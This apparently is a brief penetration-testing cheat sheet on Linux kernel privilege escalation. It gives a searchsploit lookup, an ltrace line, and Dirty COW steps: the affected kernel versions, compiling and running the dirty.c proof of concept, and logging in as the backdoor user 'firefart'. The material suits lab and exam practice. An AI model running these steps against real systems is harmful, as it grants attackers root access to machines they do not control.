Kernel Exploits

a
Search Kernel for Exploits
searchsploit "Linux Kernel" | grep <version>
Traces library function calls
ltrace ProgramName
Dirty Cow
  • Linux kernel versions 2.6.22 to 4.8.3 (inclusive) dirty.c POC

Compile it
gcc -pthread dirty.c -o dirty -lcrypt; chmod +x dirty; ./dirty
Log as firefart
su firefart
ssh firefart@10.10.10.10

Last updated